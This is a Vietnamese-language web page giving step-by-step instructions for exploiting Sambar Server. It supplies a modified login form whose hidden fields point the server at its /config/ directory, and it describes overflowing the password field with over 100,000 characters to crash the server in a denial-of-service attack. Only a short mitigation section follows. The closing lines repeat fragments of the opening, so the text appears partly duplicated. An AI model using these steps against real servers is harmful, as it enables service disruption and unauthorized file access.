Lỗi tràn bộ đệm của Server Sambar
Lỗi tràn bộ đệm của Server Sambar :trang này đã được đọc lần CÁCH KHAI THÁC: Bạn phải biết được đường dẫn (ở sambar là c:\sambar ) của form đăng nhập sysuser: BƯỚC 1: đi tới đường dẫn của form đăng nhập sysuser, nhưhttp://localhost/sysuser/index.stm. BƯỚC 2: copy và paste đoạn mã của form đăng nhập (toàn bộ) lên 1 trang khác và rename thành something.html . BƯỚC 3: đặt vào đúng chỗ http://localhost/ hoặc url cho server sambar của bạn ,cái này cho form và images , tất nhiên, form phải được connect đến đúng địa chỉ url của script server. CODE [FORM METHOD=POST ACTION="http://localhost/session/login" onsubmit="return FormValidator(this)"] [INPUT TYPE=hidden NAME="RCpage" VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop installation. [INPUT TYPE=hidden NAME="onfailure" VALUE="http://localhost/sysuser/relogin.stm"]*bạn có thể thay đổi cái này để làm tăng việc tràn bộ đệm giống như một script cgi (cái này có thể là tấn công bằng DoS)[INPUT TYPE=hidden NAME="start" VALUE=1> [INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"] [INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"] [INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"] [INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"] [INPUT TYPE=hidden NAME="RCScount" VALUE="25] [INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"] [INPUT TYPE=hidden NAME="RCSpath" VALUE="/] [INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *Đây là vấn đề* [INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*Đây là vấn đề* [INPUT TYPE=hidden NAME="RCSsortby" VALUE="name]BƯỚC 4: bây giờ bạn có thể refresh và login, dùng một user và password hợp lệ nếu bạn muốn chứng tỏ một lỗi nữa ở bước 6! BƯỚC 5: bây bạn phải nhấn submit, chờ, và nếu bạn chạy server trên máy của bạn thì server se trở nên dễ bị đổ, nếu bạn tiếp tục send thì server phải restart hoặc máy của bạn restart trong suốt quá trình tấn công!. BƯỚC 6: lỗi thứ hai là tràn bộ đệm ở vùng mật khẩu, bạn có thể chèn vào hơn 1 triệu ký tự và submit nó nhưng phải edit đoạn mã này trên máy của bạn: CODE [INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< thay đổi cái này thành . [INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="đặt text của bạn ở đây, nhớ là hơn 100000 ký tự"] và BƯỚC 7: nhấn submit và server . ! GIẢI PHÁP: - Thay đổi đường dẫn và thư mục của file liên quan đến user ở server sambar! - Những người phát triển server sambar có thể thay đổi code va phát triển một module để kiểm tra việc đi lại các file của user và bộ đệm của form transfer ở chế độ POST hay GET. . Lỗi tràn bộ đệm của Server Sambar :trang này đã được đọc lần CÁCH KHAI THÁC: Bạn phải biết được đường dẫn (ở sambar là c: sambar ) của form. ở server sambar! - Những người phát triển server sambar có thể thay đổi code va phát triển một module để kiểm tra việc đi lại các file của user và bộ đệm